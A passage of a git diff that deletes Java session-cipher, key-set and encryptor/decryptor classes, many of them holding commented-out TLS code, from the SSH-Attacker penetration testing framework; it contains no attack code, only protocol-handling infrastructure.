From the Lucky13 paper: An individual record R (viewed as a byte sequence of length at - * least zero) is processed as follows. The sender maintains an 8-byte sequence number SQN which - * is incremented for each record sent, and forms a 5-byte field HDR consisting of a 1-byte type - * field, a 2-byte version field, and a 2-byte length field. It then calculates a MAC over the - * bytes SQN || HDR || R. - * - * @param session The Record for which the data should be collected //@param protocolVersion - * According to which ProtocolVersion the AdditionalAuthenticationData is collected - * @return The AdditionalAuthenticatedData - */ - protected final byte[] collectAdditionalAuthenticatedData(Session session) { - ByteArrayOutputStream stream = new ByteArrayOutputStream(); - /*try { - if (protocolVersion.isTLS13()) { - stream.write(record.getContentType().getValue()); - stream.write(record.getProtocolVersion().getValue()); - if (record.getLength() != null && record.getLength().getValue() != null) { - stream.write( - ArrayConverter.intToBytes( - record.getLength().getValue(), RecordByteLength.RECORD_LENGTH)); - } else { - // It may happen that the record does not have a length prepared - in that case - // we will need to add - // the length of the data content - // This is mostly interessting for fuzzing - stream.write( - ArrayConverter.intToBytes( - record.getCleanProtocolMessageBytes().getValue().length, - RecordByteLength.RECORD_LENGTH)); - } - return stream.toByteArray(); - } else { - if (protocolVersion.isDTLS()) { - if (ProtocolMessageType.getContentType(record.getContentType().getValue()) - == ProtocolMessageType.TLS12_CID) { - stream.write(SEQUENCE_NUMBER_PLACEHOLDER); - stream.write(ProtocolMessageType.TLS12_CID.getValue()); - stream.write(record.getConnectionId().getValue().length); - } else { - stream.write( - ArrayConverter.intToBytes( - record.getEpoch().getValue().shortValue(), - RecordByteLength.DTLS_EPOCH)); - stream.write( - ArrayConverter.longToUint48Bytes( - record.getSequenceNumber().getValue().longValue())); - } - } else { - stream.write( - ArrayConverter.longToUint64Bytes( - record.getSequenceNumber().getValue().longValue())); - } - stream.write(record.getContentType().getValue()); - byte[] version; - if (!protocolVersion.isSSL()) { - version = record.getProtocolVersion().getValue(); - } else { - version = new byte[0]; - } - stream.write(version); - if (protocolVersion.isDTLS() - && ProtocolMessageType.getContentType(record.getContentType().getValue()) - == ProtocolMessageType.TLS12_CID) { - stream.write( - ArrayConverter.intToBytes( - record.getEpoch().getValue().shortValue(), - RecordByteLength.DTLS_EPOCH)); - stream.write( - ArrayConverter.longToUint48Bytes( - record.getSequenceNumber().getValue().longValue())); - stream.write(record.getConnectionId().getValue()); - } - int length; - if (record.getComputations().getAuthenticatedNonMetaData() == null - || record.getComputations().getAuthenticatedNonMetaData().getOriginalValue() - == null) { - // This case is required for TLS 1.2 aead encryption - length = record.getComputations().getPlainRecordBytes().getValue().length; - } else { - length = - record.getComputations() - .getAuthenticatedNonMetaData() - .getValue() - .length; - } - stream.write(ArrayConverter.intToBytes(length, RecordByteLength.RECORD_LENGTH)); - return stream.toByteArray(); - } - } catch (IOException e) { - throw new WorkflowExecutionException("Could not write data to ByteArrayOutputStream"); - }*/ - - return null; - } - - /** - * Reads a byte array from the end, and counts how many 0x00 bytes there are, until the first - * non-zero byte appears - * - * @param plainRecordBytes the byte array to count from - * @return number of trailing 0x00 bytes - */ - private int countTrailingZeroBytes(byte[] plainRecordBytes) { - int counter = 0; - for (int i = plainRecordBytes.length - 1; i < plainRecordBytes.length; i--) { - if (plainRecordBytes[i] == 0) { - counter++; - } else { - return counter; - } - } - return counter; - } - - /** - * Encapsulate plain record bytes as TLS 1.3 application data or DTLS 1.2 ConnectionID data - * container. Construction: CleanBytes | ContentType | 0x00000... (Padding) - * - * @param session the record which is affected - * @return the encapsulated data - */ - protected byte[] encapsulateRecordBytes(Session session) { - byte[] padding = - session.getComputations().getPadding() != null - ? session.getComputations().getPadding().getValue() - : new byte[0]; - return ArrayConverter.concatenate( - session.getCleanProtocolMessageBytes().getValue(), - new byte[] {session.getContentType().getValue()}, - padding); - } - - /** - * Read plain record bytes that are encapsuled as either TLS 1.3 application data or DTLS 1.2 - * ConnectionID data. Construction: CleanBytes | ContentType | 0x00000... (Padding) - * - * @param plainRecordBytes the plain encapsulated record bytes - * @param session the record which is affected - */ - protected void parseEncapsulatedRecordBytes(byte[] plainRecordBytes, Session session) { - int numberOfPaddingBytes = countTrailingZeroBytes(plainRecordBytes); - if (numberOfPaddingBytes == plainRecordBytes.length) { - LOGGER.warn( - "Record contains ONLY padding and no content type. Setting clean bytes == plainbytes"); - session.setCleanProtocolMessageBytes(plainRecordBytes); - return; - } - PlaintextParser parser = new PlaintextParser(plainRecordBytes); - byte[] cleanBytes = - parser.parseByteArrayField(plainRecordBytes.length - numberOfPaddingBytes - 1); - byte[] contentType = parser.parseByteArrayField(1); - byte[] padding = parser.parseByteArrayField(numberOfPaddingBytes); - session.getComputations().setPadding(padding); - session.setCleanProtocolMessageBytes(cleanBytes); - session.setContentType(contentType[0]); - session.setContentMessageType(ProtocolMessageType.getContentType(contentType[0])); - } - - public CipherState getState() { - return state; - } - - public void setState(CipherState state) { - this.state = state; - } - - public ConnectionEndType getLocalConnectionEndType() { - return sshContext.getContext().getConnection().getLocalConnectionEndType(); - } - - public ConnectionEndType getConnectionEndType() { - return sshContext.getChooser().getConnectionEndType(); - } - - public Integer getDefaultAdditionalPadding() { - return sshContext.getConfig().getDefaultAdditionalPadding(); - } - - public ConnectionEndType getTalkingConnectionEndType() { - return sshContext.getTalkingConnectionEndType(); - } - - public Random getRandom() { - return sshContext.getRandom(); - } - - class PlaintextParser extends Parser { - - public PlaintextParser(byte[] array) { - super(new ByteArrayInputStream(array)); - } - - @Override - public void parse(Object t) { - throw new UnsupportedOperationException("Not supported yet."); - } - - @Override - public byte[] parseByteArrayField(int length) { - return super.parseByteArrayField(length); - } - - @Override - public int getBytesLeft() { - return super.getBytesLeft(); - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java deleted file mode 100644 index 68898adad..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java +++ /dev/null @@ -1,87 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.cipher; - -/*import de.rub.nds.sshattacker.core.constants.AlgorithmResolver; -import de.rub.nds.sshattacker.core.constants.CipherSuite; -import de.rub.nds.sshattacker.core.constants.CipherType; -import de.rub.nds.sshattacker.core.constants.ExtensionType;*/ - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class SessionCipherFactory { - - private static final Logger LOGGER = LogManager.getLogger(); - - /*public static SessionCipher getSessionCipher( - SshContext sshContext, KeySet keySet, CipherSuite cipherSuite, byte[] connectionId) { - try { - if (sshContext.getChooser().getSelectedCipherSuite() == null - || !cipherSuite.isImplemented()) { - LOGGER.warn( - "Cipher " - + cipherSuite.name() - + " not implemented. Using Null Cipher instead"); - return getNullCipher(sshContext); - } else { - CipherType type = AlgorithmResolver.getCipherType(cipherSuite); - CipherState state = - new CipherState( - sshContext.getChooser().getSelectedProtocolVersion(), - cipherSuite, - keySet, - sshContext.isExtensionNegotiated(ExtensionType.ENCRYPT_THEN_MAC), - connectionId); - switch (type) { - case AEAD: - return new SessionAEADCipher(sshContext, state); - case BLOCK: - return new SessionBlockCipher(sshContext, state); - case STREAM: - return new SessionStreamCipher(sshContext, state); - default: - LOGGER.warn("UnknownCipherType:" + type.name()); - return new SessionNullCipher(sshContext, state); - } - } - } catch (Exception e) { - LOGGER.debug( - "Could not create RecordCipher from the current Context! Creating null Cipher", - e); - return getNullCipher(sshContext); - } - }*/ - - /*public static SessionCipher getSessionCipher( - TlsContext tlsContext, KeySet keySet, boolean isForEncryption) { - return getSessionCipher( - tlsContext, - keySet, - tlsContext.getChooser().getSelectedCipherSuite(), - isForEncryption - ? tlsContext.getWriteConnectionId() - : tlsContext.getReadConnectionId()); - }*/ - - public static SessionNullCipher getNullCipher(SshContext sshContext) { - return new SessionNullCipher( - sshContext, - new CipherState( - sshContext.getChooser().getSelectedCompressionAlgorithm(), - sshContext.getChooser().getSelectedEncryptionAlgorithm(), - sshContext.getChooser().getSelectedMacAlgorithm(), - sshContext.getChooser().getSelectedKeyExchangeAlgorithm(), - null, - null, - null)); - } - - private SessionCipherFactory() {} -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java deleted file mode 100644 index e676095eb..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java +++ /dev/null @@ -1,40 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.cipher; - -import de.rub.nds.sshattacker.core.exceptions.CryptoException; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.session.Session; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class SessionNullCipher extends SessionCipher { - - private static final Logger LOGGER = LogManager.getLogger(); - - public SessionNullCipher(SshContext sshContext, CipherState state) { - super(sshContext, state); - } - - @Override - public void encrypt(Session session) throws CryptoException { - - LOGGER.debug("Encrypting Record: (null cipher)"); - session.prepareComputations(); - byte[] cleanBytes = session.getCleanProtocolMessageBytes().getValue(); - session.setProtocolMessageBytes(cleanBytes); - } - - @Override - public void decrypt(Session session) throws CryptoException { - LOGGER.debug("Decrypting Record: (null cipher)"); - session.prepareComputations(); - byte[] protocolMessageBytes = session.getProtocolMessageBytes().getValue(); - session.setCleanProtocolMessageBytes(protocolMessageBytes); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java deleted file mode 100644 index f5f8b84de..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java +++ /dev/null @@ -1,126 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.cipher.cryptohelper; - -import de.rub.nds.tlsattacker.transport.ConnectionEndType; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class KeySet { - - private static final Logger LOGGER = LogManager.getLogger(); - - private byte[] clientWriteMacSecret; - private byte[] serverWriteMacSecret; - private byte[] clientWriteKey; - private byte[] serverWriteKey; - private byte[] clientWriteIv; - private byte[] serverWriteIv; - - public KeySet() {} - - public byte[] getClientWriteMacSecret() { - return clientWriteMacSecret; - } - - public void setClientWriteMacSecret(byte[] clientWriteMacSecret) { - this.clientWriteMacSecret = clientWriteMacSecret; - } - - public byte[] getServerWriteMacSecret() { - return serverWriteMacSecret; - } - - public void setServerWriteMacSecret(byte[] serverWriteMacSecret) { - this.serverWriteMacSecret = serverWriteMacSecret; - } - - public byte[] getClientWriteKey() { - return clientWriteKey; - } - - public void setClientWriteKey(byte[] clientWriteKey) { - this.clientWriteKey = clientWriteKey; - } - - public byte[] getServerWriteKey() { - return serverWriteKey; - } - - public void setServerWriteKey(byte[] serverWriteKey) { - this.serverWriteKey = serverWriteKey; - } - - public byte[] getClientWriteIv() { - return clientWriteIv; - } - - public void setClientWriteIv(byte[] clientWriteIv) { - this.clientWriteIv = clientWriteIv; - } - - public byte[] getServerWriteIv() { - return serverWriteIv; - } - - public void setServerWriteIv(byte[] serverWriteIv) { - this.serverWriteIv = serverWriteIv; - } - - public byte[] getWriteKey(ConnectionEndType connectionEndType) { - if (connectionEndType == ConnectionEndType.CLIENT) { - return clientWriteKey; - } else { - return serverWriteKey; - } - } - - public byte[] getReadKey(ConnectionEndType connectionEndType) { - if (connectionEndType == ConnectionEndType.SERVER) { - LOGGER.debug( - "getReadKey: Using clientWriteKey for connectionEndType {}", connectionEndType); - return clientWriteKey; - } else { - LOGGER.debug( - "getReadKey: Using serverWriteKey for connectionEndType {}", connectionEndType); - return serverWriteKey; - } - } - - public byte[] getReadMacSecret(ConnectionEndType connectionEndType) { - if (connectionEndType == ConnectionEndType.SERVER) { - return clientWriteMacSecret; - } else { - return serverWriteMacSecret; - } - } - - public byte[] getWriteMacSecret(ConnectionEndType connectionEndType) { - if (connectionEndType == ConnectionEndType.CLIENT) { - return clientWriteMacSecret; - } else { - return serverWriteMacSecret; - } - } - - public byte[] getWriteIv(ConnectionEndType connectionEndType) { - if (connectionEndType == ConnectionEndType.CLIENT) { - return clientWriteIv; - } else { - return serverWriteIv; - } - } - - public byte[] getReadIv(ConnectionEndType connectionEndType) { - if (connectionEndType == ConnectionEndType.SERVER) { - return clientWriteIv; - } else { - return serverWriteIv; - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java deleted file mode 100644 index 69326351a..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java +++ /dev/null @@ -1,262 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.cipher.cryptohelper; - -import de.rub.nds.sshattacker.core.exceptions.CryptoException; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import java.security.NoSuchAlgorithmException; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class KeySetGenerator { - - private static final Logger LOGGER = LogManager.getLogger(); - - private static final int AEAD_IV_LENGTH = 12; - - /*public static KeySet generateKeySet( - SshContext sshContext, ProtocolVersion protocolVersion, Tls13KeySetType keySetType) - throws NoSuchAlgorithmException, CryptoException { - if (protocolVersion.isTLS13()) { - return getTls13KeySet(sshContext, keySetType); - } else { - return getTlsKeySet(sshContext); - } - }*/ - - public static KeySet generateKeySet(SshContext sshContext) - throws NoSuchAlgorithmException, CryptoException { - /*return generateKeySet(sshContext, sshContext.getChooser().getSelectedProtocolVersion(), - sshContext.getActiveKeySetTypeWrite());*/ - - return getTlsKeySet(sshContext); - } - - /*private static KeySet getTls13KeySet(SshContext sshContext, Tls13KeySetType keySetType) - throws CryptoException { - CipherSuite cipherSuite = sshContext.getChooser().getSelectedCipherSuite(); - byte[] clientSecret = new byte[0]; - byte[] serverSecret = new byte[0]; - if (null == keySetType) { - throw new CryptoException("Unknown KeySetType:" + keySetType.name()); - } else { - switch (keySetType) { - case HANDSHAKE_TRAFFIC_SECRETS: - clientSecret = sshContext.getChooser().getClientHandshakeTrafficSecret(); - serverSecret = sshContext.getChooser().getServerHandshakeTrafficSecret(); - break; - case APPLICATION_TRAFFIC_SECRETS: - clientSecret = sshContext.getChooser().getClientApplicationTrafficSecret(); - serverSecret = sshContext.getChooser().getServerApplicationTrafficSecret(); - break; - case EARLY_TRAFFIC_SECRETS: - cipherSuite = sshContext.getChooser().getEarlyDataCipherSuite(); - clientSecret = sshContext.getChooser().getClientEarlyTrafficSecret(); - serverSecret = sshContext.getChooser().getClientEarlyTrafficSecret(); - break; - case NONE: - LOGGER.warn("KeySet is NONE! , returning empty KeySet"); - return new KeySet(keySetType); - default: - throw new CryptoException("Unknown KeySetType:" + keySetType.name()); - } - } - LOGGER.debug("ActiveKeySetType is " + keySetType); - CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); - KeySet keySet = new KeySet(keySetType); - HKDFAlgorithm hkdfAlgorithm = AlgorithmResolver.getHKDFAlgorithm(cipherSuite); - keySet.setClientWriteKey( - HKDFunction.expandLabel( - hkdfAlgorithm, - clientSecret, - HKDFunction.KEY, - new byte[] {}, - cipherAlg.getKeySize())); - LOGGER.debug( - "Client write key: {}", - ArrayConverter.bytesToHexString(keySet.getClientWriteKey())); - keySet.setServerWriteKey( - HKDFunction.expandLabel( - hkdfAlgorithm, - serverSecret, - HKDFunction.KEY, - new byte[] {}, - cipherAlg.getKeySize())); - LOGGER.debug( - "Server write key: {}", - ArrayConverter.bytesToHexString(keySet.getServerWriteKey())); - keySet.setClientWriteIv( - HKDFunction.expandLabel( - hkdfAlgorithm, - clientSecret, - HKDFunction.IV, - new byte[] {}, - AEAD_IV_LENGTH)); - LOGGER.debug( - "Client write IV: {}", ArrayConverter.bytesToHexString(keySet.getClientWriteIv())); - keySet.setServerWriteIv( - HKDFunction.expandLabel( - hkdfAlgorithm, - serverSecret, - HKDFunction.IV, - new byte[] {}, - AEAD_IV_LENGTH)); - LOGGER.debug( - "Server write IV: {}", ArrayConverter.bytesToHexString(keySet.getServerWriteIv())); - keySet.setServerWriteMacSecret(new byte[0]); - keySet.setClientWriteMacSecret(new byte[0]); - return keySet; - }*/ - - private static KeySet getTlsKeySet(SshContext sshContext) throws CryptoException { - /*ProtocolVersion protocolVersion = sshContext.getChooser().getSelectedProtocolVersion(); - CipherSuite cipherSuite = sshContext.getChooser().getSelectedCipherSuite(); - byte[] masterSecret = sshContext.getChooser().getMasterSecret(); - byte[] seed = - ArrayConverter.concatenate( - sshContext.getChooser().getServerRandom(), - sshContext.getChooser().getClientRandom()); - - byte[] keyBlock; - if (protocolVersion.isSSL()) { - keyBlock = - SSLUtils.calculateKeyBlockSSL3( - masterSecret, seed, getSecretSetSize(protocolVersion, cipherSuite)); - } else { - PRFAlgorithm prfAlgorithm = - AlgorithmResolver.getPRFAlgorithm(protocolVersion, cipherSuite); - keyBlock = - PseudoRandomFunction.compute( - prfAlgorithm, - masterSecret, - PseudoRandomFunction.KEY_EXPANSION_LABEL, - seed, - getSecretSetSize(protocolVersion, cipherSuite)); - } - LOGGER.debug( - "A new key block was generated: {}", ArrayConverter.bytesToHexString(keyBlock)); - KeyBlockParser parser = new KeyBlockParser(keyBlock, cipherSuite, protocolVersion); - KeySet keySet = new KeySet(); - parser.parse(keySet); - if (cipherSuite.isExportSymmetricCipher()) { - deriveExportKeys(keySet, sshContext); - } - return keySet;*/ - return null; - } - - /*private static void deriveExportKeys(KeySet keySet, TlsContext tlsContext) - throws CryptoException { - ProtocolVersion protocolVersion = tlsContext.getChooser().getSelectedProtocolVersion(); - CipherSuite cipherSuite = tlsContext.getChooser().getSelectedCipherSuite(); - byte[] clientRandom = tlsContext.getChooser().getClientRandom(); - byte[] serverRandom = tlsContext.getChooser().getServerRandom(); - - if (protocolVersion == ProtocolVersion.SSL3) { - deriveSSL3ExportKeys(cipherSuite, keySet, clientRandom, serverRandom); - return; - } - - byte[] clientAndServerRandom = ArrayConverter.concatenate(clientRandom, serverRandom); - PRFAlgorithm prfAlgorithm = AlgorithmResolver.getPRFAlgorithm(protocolVersion, cipherSuite); - int keySize = AlgorithmResolver.getCipher(cipherSuite).getKeySize(); - - keySet.setClientWriteKey( - PseudoRandomFunction.compute( - prfAlgorithm, - keySet.getClientWriteKey(), - PseudoRandomFunction.CLIENT_WRITE_KEY_LABEL, - clientAndServerRandom, - keySize)); - keySet.setServerWriteKey( - PseudoRandomFunction.compute( - prfAlgorithm, - keySet.getServerWriteKey(), - PseudoRandomFunction.SERVER_WRITE_KEY_LABEL, - clientAndServerRandom, - keySize)); - - int blockSize = AlgorithmResolver.getCipher(cipherSuite).getBlocksize(); - byte[] emptySecret = {}; - byte[] ivBlock = - PseudoRandomFunction.compute( - prfAlgorithm, - emptySecret, - PseudoRandomFunction.IV_BLOCK_LABEL, - clientAndServerRandom, - 2 * blockSize); - keySet.setClientWriteIv(Arrays.copyOfRange(ivBlock, 0, blockSize)); - keySet.setServerWriteIv(Arrays.copyOfRange(ivBlock, blockSize, 2 * blockSize)); - } - - private static byte[] md5firstNBytes(int numOfBytes, byte[]... byteArrays) { - byte[] md5 = MD5Utils.md5(byteArrays); - return Arrays.copyOfRange(md5, 0, numOfBytes); - } - - private static void deriveSSL3ExportKeys( - CipherSuite cipherSuite, KeySet keySet, byte[] clientRandom, byte[] serverRandom) { - int keySize = AlgorithmResolver.getCipher(cipherSuite).getKeySize(); - keySet.setClientWriteKey( - md5firstNBytes(keySize, keySet.getClientWriteKey(), clientRandom, serverRandom)); - keySet.setServerWriteKey( - md5firstNBytes(keySize, keySet.getServerWriteKey(), serverRandom, clientRandom)); - - int blockSize = AlgorithmResolver.getCipher(cipherSuite).getBlocksize(); - keySet.setClientWriteIv(md5firstNBytes(blockSize, clientRandom, serverRandom)); - keySet.setServerWriteIv(md5firstNBytes(blockSize, serverRandom, clientRandom)); - } - - private static int getSecretSetSize(ProtocolVersion protocolVersion, CipherSuite cipherSuite) - throws CryptoException { - switch (AlgorithmResolver.getCipherType(cipherSuite)) { - case AEAD: - return getAeadSecretSetSize(protocolVersion, cipherSuite); - case BLOCK: - return getBlockSecretSetSize(protocolVersion, cipherSuite); - case STREAM: - return getStreamSecretSetSize(protocolVersion, cipherSuite); - default: - throw new CryptoException("Unknown CipherType"); - } - } - - private static int getBlockSecretSetSize( - ProtocolVersion protocolVersion, CipherSuite cipherSuite) { - CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); - int keySize = cipherAlg.getKeySize(); - MacAlgorithm macAlg = AlgorithmResolver.getMacAlgorithm(protocolVersion, cipherSuite); - int secretSetSize = (2 * keySize) + (2 * macAlg.getKeySize()); - if (!protocolVersion.usesExplicitIv()) { - secretSetSize += (2 * cipherAlg.getNonceBytesFromHandshake()); - } - return secretSetSize; - } - - private static int getAeadSecretSetSize( - ProtocolVersion protocolVersion, CipherSuite cipherSuite) { - CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); - int keySize = cipherAlg.getKeySize(); - int saltSize = AEAD_IV_LENGTH - cipherAlg.getNonceBytesFromRecord(); - int secretSetSize = 2 * keySize + 2 * saltSize; - return secretSetSize; - } - - private static int getStreamSecretSetSize( - ProtocolVersion protocolVersion, CipherSuite cipherSuite) { - CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); - MacAlgorithm macAlg = AlgorithmResolver.getMacAlgorithm(protocolVersion, cipherSuite); - int secretSetSize = (2 * cipherAlg.getKeySize()) + (2 * macAlg.getKeySize()); - if (cipherSuite.isSteamCipherWithIV()) { - secretSetSize += (2 * cipherAlg.getNonceBytesFromHandshake()); - } - return secretSetSize; - }*/ - - private KeySetGenerator() {} -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java deleted file mode 100644 index f18073d4e..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java +++ /dev/null @@ -1,24 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.crypto; - -import de.rub.nds.sshattacker.core.session.Session; -import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public abstract class Decryptor extends SessionCryptoUnit { - - private static final Logger LOGGER = LogManager.getLogger(); - - public Decryptor(SessionCipher cipher) { - super(cipher); - } - - public abstract void decrypt(Session object); -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java deleted file mode 100644 index a127f092f..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java +++ /dev/null @@ -1,24 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.crypto; - -import de.rub.nds.sshattacker.core.session.Session; -import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public abstract class Encryptor extends SessionCryptoUnit { - - private static final Logger LOGGER = LogManager.getLogger(); - - public Encryptor(SessionCipher cipher) { - super(cipher); - } - - public abstract void encrypt(Session object); -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java deleted file mode 100644 index 47f3a2417..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java +++ /dev/null @@ -1,56 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.crypto; - -import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; -import java.util.ArrayList; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public abstract class SessionCryptoUnit { - - private static final Logger LOGGER = LogManager.getLogger(); - - protected ArrayList sessionCipherList; - - public SessionCryptoUnit(SessionCipher sessionCipher) { - this.sessionCipherList = new ArrayList<>(); - sessionCipherList.add(0, sessionCipher); - } - - public SessionCipher getSessionMostRecentCipher() { - return sessionCipherList.get(sessionCipherList.size() - 1); - } - - public SessionCipher getSessionCipher(int epoch) { - if (sessionCipherList.size() > epoch) { - return sessionCipherList.get(epoch); - } else { - LOGGER.warn("Got no RecordCipher for epoch: " + epoch + " using epoch 0 cipher"); - return sessionCipherList.get(0); - } - } - - public void addNewRecordCipher(SessionCipher sessionCipher) { - this.sessionCipherList.add(sessionCipher); - } - - public void removeAllCiphers() { - this.sessionCipherList = new ArrayList<>(); - } - - public void removeCiphers(int toRemove) { - while (toRemove > 0 && !sessionCipherList.isEmpty()) { - sessionCipherList.remove(sessionCipherList.size() - 1); - toRemove--; - } - if (toRemove > 0) { - LOGGER.warn("Could not remove as many ciphers as specified"); - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java deleted file mode 100644 index 1341e0cb7..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java +++ /dev/null @@ -1,65 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.crypto; - -import de.rub.nds.sshattacker.core.exceptions.ParserException; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.session.Session; -import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; -import de.rub.nds.sshattacker.core.session.cipher.SessionCipherFactory; -import de.rub.nds.sshattacker.core.session.cipher.SessionNullCipher; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class SessionDecryptor extends Decryptor { - - private static final Logger LOGGER = LogManager.getLogger(); - - private final SshContext sshContext; - - private SessionNullCipher nullCipher; - - public SessionDecryptor(SessionCipher sessionCipher, SshContext sshContext) { - super(sessionCipher); - this.sshContext = sshContext; - nullCipher = SessionCipherFactory.getNullCipher(sshContext); - } - - @Override - public void decrypt(Session session) throws ParserException { - LOGGER.debug("Decrypting Record"); - SessionCipher sessionCipher; - /*if (sshContext.getChooser().getSelectedProtocolVersion().isDTLS() - && session.getEpoch() != null - && session.getEpoch().getValue() != null) { - sessionCipher = getSessionCipher(session.getEpoch().getValue()); - } else { - sessionCipher = getSessionMostRecentCipher(); - }*/ - session.prepareComputations(); - /*ProtocolVersion version = - ProtocolVersion.getProtocolVersion(session.getProtocolVersion().getValue()); - if (version == null || !version.isDTLS()) { - session.setSequenceNumber( - BigInteger.valueOf(sessionCipher.getState().getReadSequenceNumber())); - } - - try { - if (!sshContext.getChooser().getSelectedProtocolVersion().isTLS13() - || session.getContentMessageType() != ProtocolMessageType.CHANGE_CIPHER_SPEC) { - sessionCipher.decrypt(session); - sessionCipher.getState().increaseReadSequenceNumber(); - } else { - LOGGER.debug("Skipping decryption for legacy CCS"); - new RecordNullCipher(sshContext, sessionCipher.getState()).decrypt(session); - } - } catch (CryptoException ex) { - throw new ParserException(ex); - }*/ - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java deleted file mode 100644 index c776619e0..000000000 --- 